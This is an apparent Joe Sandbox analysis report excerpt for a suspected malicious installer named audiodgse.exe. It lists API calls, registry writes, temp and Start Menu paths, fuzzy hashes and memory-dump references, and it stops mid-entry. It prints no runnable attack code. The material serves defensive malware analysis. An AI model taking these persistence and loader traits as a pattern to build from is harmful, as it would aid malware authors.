Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\AppData\Roaming\audiodgse.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2808085727
Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction ID: 2f7af396f84d097035df83fe1d719984909df90e6a6ed76a9758152acb097983
Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction Fuzzy Hash: B9F082367082086BEB108F5ADC04B9B7BA8DF91750F14803BFA08DA291D6B4B9548B69

Uniqueness

Uniqueness Score: -1.00%

Function 72BE16DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 72BE1A98: GlobalFree.KERNEL32(?), ref: 72BE1D09
Part of subcall function 72BE1A98: GlobalFree.KERNEL32(?), ref: 72BE1D0E
Part of subcall function 72BE1A98: GlobalFree.KERNEL32(?), ref: 72BE1D13

GlobalFree.KERNEL32(00000000), ref: 72BE1786
FreeLibrary.KERNEL32(?), ref: 72BE1809
GlobalFree.KERNEL32(00000000), ref: 72BE182E

Part of subcall function 72BE22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 72BE22E0

Part of subcall function 72BE26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,72BE1757,00000000), ref: 72BE2782

Part of subcall function 72BE156B: wsprintfA.USER32 ref: 72BE1599

Strings

, xrefs: 72BE180F

Memory Dump Source

Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true

Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 094b181c46e2c33ce68bef63ae25bc39b74f430039c9364a5265d842e27d1af1
Instruction ID: 663884e89916643d0535cd23475f273518eb7fa6e70678257f9555c58c9388a2
Opcode Fuzzy Hash: 094b181c46e2c33ce68bef63ae25bc39b74f430039c9364a5265d842e27d1af1
Instruction Fuzzy Hash: 914192F1C10204DBDB019F7CC985B9A3BBCFF84714F24A4A9E9179A186EB749845CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32 ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
Instruction ID: 5540d85999f992b2d0d9c3d63f09df6deeece4c427f082cd61f041684b2cd5b6
Opcode Fuzzy Hash: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
Instruction Fuzzy Hash: 6E216BB1D48208BEEF06AFB4D98AAAD7FB5EB44304F10447EF501B61D1C7B89640DB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040243D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00000023,00000011,00000002), ref: 00402488
RegSetValueExA.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00000000), ref: 004024C5
RegCloseKey.KERNEL32(?), ref: 004025A9

Strings

C:\Users\user\AppData\Local\Temp\nsfF9C.tmp, xrefs: 00402479, 0040249B, 004024AF, 004024BA

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp
API String ID: 2655323295-4240112750
Opcode ID: 644d45e961fb075661f6586c1a8c683fb18e4013c471b180fd38698a93afd6b7
Instruction ID: 8e9ea0cf859de5a6fe7672b5a81e2234dbec8cc7450cb22075f11fbb1059ccd6
Opcode Fuzzy Hash: 644d45e961fb075661f6586c1a8c683fb18e4013c471b180fd38698a93afd6b7
Instruction Fuzzy Hash: 42119072E00218BEEB01AFA58E49EAE7BB8FB48314F20443BF504B71C1C6B85D419B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040206A Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402095

Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll), ref: 0040516F
Part of subcall function 00405101: SendMessageA.USER32 ref: 00405195
Part of subcall function 00405101: SendMessageA.USER32 ref: 004051AF
Part of subcall function 00405101: SendMessageA.USER32 ref: 004051BD

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020A5
GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 004020B5
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 0040211F

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 6e927463b8a72c0dbe1b725f1c041be6a871195800c1405556db6ca052780107
Instruction ID: 97d835e61fc7e0b97890b4be7664cc53dce4a02014942e479506a03d8351e840
Opcode Fuzzy Hash: 6e927463b8a72c0dbe1b725f1c041be6a871195800c1405556db6ca052780107
Instruction Fuzzy Hash: 4521D871A00214BBCF117FA4CE8DAAE79B4AB44319F20413BFA01B62D0C6FD9981D65E

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00405A0B: CharNextA.USER32(?), ref: 00405A19
Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004055C7: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers, xrefs: 00401631

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers
API String ID: 1892508949-1636881305
Opcode ID: 54bd2716cff20c5ce2502cd1f1846264e2b1d456c8e0a835d425a5356db0bc86
Instruction ID: 3a09c20382928311ba1d31a626229d1df209b5e1cddac7105c79dbf72218ebe6
Opcode Fuzzy Hash: 54bd2716cff20c5ce2502cd1f1846264e2b1d456c8e0a835d425a5356db0bc86
Instruction Fuzzy Hash: B4112731508141EBCB212FB94D4197F36B0EA96325F28453FE4D2B23E2D63D49429A3F

Uniqueness

Uniqueness Score: -1.00%

Function 00405EC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32 ref: 00405F07
RegCloseKey.KERNEL32(?), ref: 00405F12

Strings

Call, xrefs: 00405EC4, 00405EF8

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
Instruction ID: 897067c620da28adabf34c96f4b8630bfa599ba4fb7ce992f063a5310404d611
Opcode Fuzzy Hash: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
Instruction Fuzzy Hash: 6D015A7251020AABEF22CF61CC09FDB3BACEF55364F004026FA55A2190D278DA54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406A9B Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
Instruction ID: 81ce818a04e0c3cc04ce684d9a2a9ddfd009c22adec174195ca66df60ea86fc9
Opcode Fuzzy Hash: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
Instruction Fuzzy Hash: 69A14271E00229DBDF28CFA8C8446ADBBB1FF44305F15842AD916BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406C9C Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
Instruction ID: 08e1f0bd3e012b2653e952fb076f5459688999f8fa16d8000732ef154d800f7e
Opcode Fuzzy Hash: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
Instruction Fuzzy Hash: 53912370E00229CBEF28CF98C8547ADBBB1FF44305F15816AD956BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004069B2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
Instruction ID: f9b0e14a80994b8e3cce9b061f2e265d206a391058c15f1564a8a9ac8da356b6
Opcode Fuzzy Hash: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
Instruction Fuzzy Hash: 80814571D04229DFDF24CFA8C8847ADBBB1FB44305F25816AD816BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004064B7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
Instruction ID: 64fae73fcf261b5a29c0697abf595a3f572636c651b32177eb72ec05398ad39b
Opcode Fuzzy Hash: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
Instruction Fuzzy Hash: 39817831D04229DBEF24CFA8D8447ADBBB0FB44305F21816AD856BB2C1C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406905 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
Instruction ID: 51e77fe0f08f8d7ba03d7e1561fc41eb13955110d3fdee4e61b85cd17e52ee3e
Opcode Fuzzy Hash: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
Instruction Fuzzy Hash: C4712371D04229DBEF28CF98C8447ADBBB1FB44305F15806AD806BB281D7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406A23 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
Instruction ID: 3517892101dd69bd75e64738494877d03a8317e446f0652336487a17687a2cae
Opcode Fuzzy Hash: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
Instruction Fuzzy Hash: 53712571E04229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281D7789996DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040696F Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
Instruction ID: 34c5161cf4e4322df4c522de15ced9ded486b5ca7425d8c28145854c0c0886a7
Opcode Fuzzy Hash: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
Instruction Fuzzy Hash: 29714571D04229DBEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00401B63 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BD2
GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BE4

Strings

Call, xrefs: 00401B8A, 00401B90, 00401BAA

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 1fe632c829319894c03c4f390d25a6009dfdfdfa543a20855fb3c628d0abeb6c
Instruction ID: 90574936f02aea29710b4ee6ae69819f4a98e20e624d26ff257ec3688bf7659d
